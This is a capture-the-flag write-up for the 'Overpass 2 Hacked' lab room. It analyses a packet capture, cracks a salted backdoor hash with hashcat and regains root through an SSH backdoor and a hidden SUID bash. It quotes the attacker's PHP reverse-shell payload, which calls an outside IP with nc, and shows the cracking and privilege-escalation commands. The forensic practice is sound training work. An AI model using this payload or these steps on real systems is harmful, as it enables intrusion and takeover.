[THM] Overpass 2 Hacked

Overpass has been hacked! Can you analyse the attacker’s actions and hack back in?

Link to the room

Overview

This room begins with a packet capture to be analyzed. From this capture you have to obtain a password.
After this first step, a script is analyzed and a hash is obtained which must be decrypted to obtain another password.
Finally, i connect to the machine through the ssh server that the hacker had previously left and a shell with special privileges is executed to obtain root

[Task 1] Forensics — Analyse the PCAP

#1 What was the URL of the page they used to upload a reverse shell?

I just get into wireshark and filter by http

/development/

#2 What payload did the attacker use to gain access?

when looking at the details of the POST request I see that revshell has uploaded the user

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>

#3 What password did the attacker use to privesc?

look at the details of a tcp connection

whenevernoteartinstant

#4 How did the attacker establish persistence?

https://github.com/NinjaJc01/ssh-backdoor

#5 Using the fasttrack wordlist, how many of the system passwords were crackable?

4

[Task 2] Research — Analyse the code

#1 What’s the default hash for the backdoor?

Github

bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3

#2 What’s the hardcoded salt for the backdoor?

1c362db832f3f864c8c2fe05f2002a05

#3 What was the hash that the attacker used? — go back to the PCAP for this!

6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

#4 Crack the hash using rockyou and a cracking tool of your choice. What’s the password?

I’m going to use hashcat to crack the hash with the salt

a quick search on “hashact methods” leads me to this way of cracking sha512 + salt

1710 | sha512($pass.$salt)

root@kali:~# hashcat -m 1710 "6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05" --force /usr/share/wordlists/rockyou.txt
hashcat (v5.1.0) starting...
OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz, 1024/2477 MB allocatable, 1MCU
...6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05:november16

...
november16

[Task 3] Attack — Get back in!

#1 The attacker defaced the website. What message did they leave as a heading?

H4ck3d by CooctusClan

#3 What’s the user flag?

$ nmap -sC -sV -T4 10.10.51.64
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-24 11:58 CEST
Nmap scan report for 10.10.51.64
Host is up (0.053s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e4:3a:be:ed:ff:a7:02:d2:6a:d6:d0:bb:7f:38:5e:cb (RSA)
| 256 fc:6f:22:c2:13:4f:9c:62:4f:90:c9:3a:7e:77:d6:d4 (ECDSA)
|_ 256 15:fd:40:0a:65:59:a9:b5:0e:57:1b:23:0a:96:63:05 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: LOL Hacked
2222/tcp open ssh OpenSSH 8.2p1 Debian 4 (protocol 2.0)
| ssh-hostkey:
|_ 2048 a2:a6:d2:18:79:e3:b0:20:a2:4f:aa:b6:ac:2e:6b:f2 (RSA)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.98 seconds

Since I have the password for the back door I guess I can get in there

$ ssh -p 2222 10.10.51.64
root@10.10.51.64s password: #november16
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
james@overpass-production:/home/james/ssh-backdoor$
thm{********************************}

#4 What’s the root flag?

in james’s directory there is hidden a binary .suid_bash which executes a bash, maybe if I do not reset my permissions I can make said executable grant me privileges:

james@overpass-production:/home/james$ ./.suid_bash -p 
.suid_bash-4.4# id
uid=1000(james) gid=1000(james) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),1000(james)
.suid_bash-4.4#
thm{********************************}

Computer Science student. Capture the flag player.